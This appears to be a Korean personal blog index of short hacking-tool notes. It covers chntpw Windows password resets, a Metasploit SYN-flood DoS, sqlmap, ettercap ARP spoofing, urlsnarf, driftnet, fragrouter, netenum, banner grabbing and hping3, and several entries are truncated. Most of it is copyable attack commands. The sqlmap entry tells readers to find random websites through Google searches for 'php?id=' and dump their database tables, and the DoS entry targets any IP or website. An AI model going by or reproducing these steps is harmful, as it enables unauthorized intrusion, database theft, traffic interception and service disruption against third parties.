Lute3r.log

Chntpw 윈도우 로그인 패스워드 초기화 및 변경 사용 방법 cd /mnt/hda1/WINDOWS/system32/config 이동 SAM 파일 확인 chntpw -l SAM 유저 목록 확인 chntpw -u "유저이름" SAM 1 [Enter] y [Enter] (유저 패스워드 초기화) chntpw -u "유저이름" SAM 3 [Enter] y [Enter] (해당 유저를 관리자로 설정) chntpw -u "유저이름" SAM 4 [Enter] (계정 활성화) ex) chntpw -u "administrator" SAM reboot ps. 해본 결과 1번만 해도 패스워드는 풀리긴 한다 [동영상] https://www.youtube.com/watch?v=XHaYoeUfuAI

Ddos attack using metasploit * open terminal * msfconsole * use auxiliary/dos/tcp/synflood * show options * set RHOST (ip or website) * exploit

SQLmap 1. google 에서 php?id= 으로 검색 2. 사이트 진입후 주소창 맨뒤 ' 입력후 sql 오류 문구 나오는지 확인 3. ' 를 제외한 주소 복사 4. 터미널 입력 # sqlmap -u http://xxx.xx/aa.php?id=11 --dbs 5. DB 목록 나오는지 확인 # sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] --tables 6. Table 목록 나오는지 확인 # sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] -T [Table명] --dump

ettercap 10.0.2.1 Gateway 10.0.2.50 Target TUI ettercap -Tqi eth0 -M ARP:REMOTE /10.0.2.1// /10.0.2.50// https://www.ettercap-project.org/

URLsnarf 공격 대상이 어떤 웹 사이트를 방문하고 있는지 확인할 수 있다. 사용법 1) arpspoof & forwarding ettercap -Tqi eth0 -M ARP:REMOTE /10.0.2.1// /10.0.2.50// 2) urlsnarf urlsnarf -i eth0 접속한 사이트 url만 출력 urlsnarf -i eth0 | cut -d\" -f4 오류 메시지 urlsnarf : listening on eth0 tcp port 80 or port 8080 or port 3128 해결 방법 sudo apt-add-repository ppa:evarlast/dsniff sudo apt-get update sudo apt-get upgrade https://launchpad.net/~e..

Fragrouter 설치 다운로드 1) 설치 전 필요 프로그램 설치 sudo apt-get install bison sudo apt-get install byacc 2) 설치 ./configure make make install 3) 오류만약, bison과 byacc 설치 없이 make 하여 오류가 나왔다면 Libnet-0.99b libpcap-0.4 현재 fragrouter 폴더 에서 make clean make distclean 후 bison, byacc 설치 한다음 다시 fragrouter 폴더에서 설치 진행 할것 make 명령으로 생성된 파일 삭제 make clean 압축 푼 후 상태로(초기상태) make distclean 4) 이동 및 실행echo $PATH 로 경로 확인후 fragrouter ..

Driftnet 자신 또는 해당 인터페이스로 지나가는 이미지 파일 확인 사용방법 1) 자신이 사용하는 환경에서 이미지 파일 확인 driftnet 2) 특정 인터페이스에 지나가는 이미지 파일 확인 driftnet -i eth0 이미지 파일 저장 위치/tmp/drifnet-~ 주의이미지 클릭하면 driftnet 이 종료 되고 /tmp 에 저장된 파일이 삭제되는 경우가 있음

Netenum - 네트워크에 살아있는 IP 확인- 강력하진 않지만 살아있는 호스트 목록을 매우 빠르게 확인할 수 있다 옵션 설명 timeout 응답을 기다리는 최대 시간을 지정(단위: 초) verbosity verbosity 레벨을 지정(0~3), 기본값: 0(권장값) 사용법netenum 사용 예netenum 10.0.2.0/24 10 0 주의점timeout을 지정하지 않으면 모든 호스트의 IP가 나열되는 오탐이 발생한다. http://www.aldeid.com/wiki/netenum

Banner Grabbing 웹서버 상대로 노출되어있는 정보 수집웹서버 종류에 따라 OS 정보까지 수집 되기도함 사용법 > telnet www.naver.com 80 head / http / 1.0 엔터 두번

Hping3 hping은 TCP/IP 프로토콜에 대한 무료 패킷 생성기이자 분석기다. hping은 보안 감사, 방화벽과 네트워크 대역 테스트 도구 중 하나다. 지금은 엔맵 포트 스캐너에서 네트워크 스캔 기술을 악용하는 데 사용된다.hping 의 새로운 버전인 hping3은 스크립트 프로그래머가 낮은 수준의 TCP/IP 패킷 조작이나 분석에 관한 스크립트를 작성할 수 있게 Tcl 언어를 사용하고 TCP/IP 패킷의 문자열을 기반으로, 아주 짧은 시간에 사람이 읽을 수 있는 설명을 위한 엔진을 구현한다. - PING -> ICMP 프로토콜 기본- HPING -> TCP/IP 프로토콜 기본(옵션으로 변경 가능) 옵션 (맨 밑에 자세한 옵션 있음) -a : 변조할 IP-p : 포트번호 -S : Syn Flag ..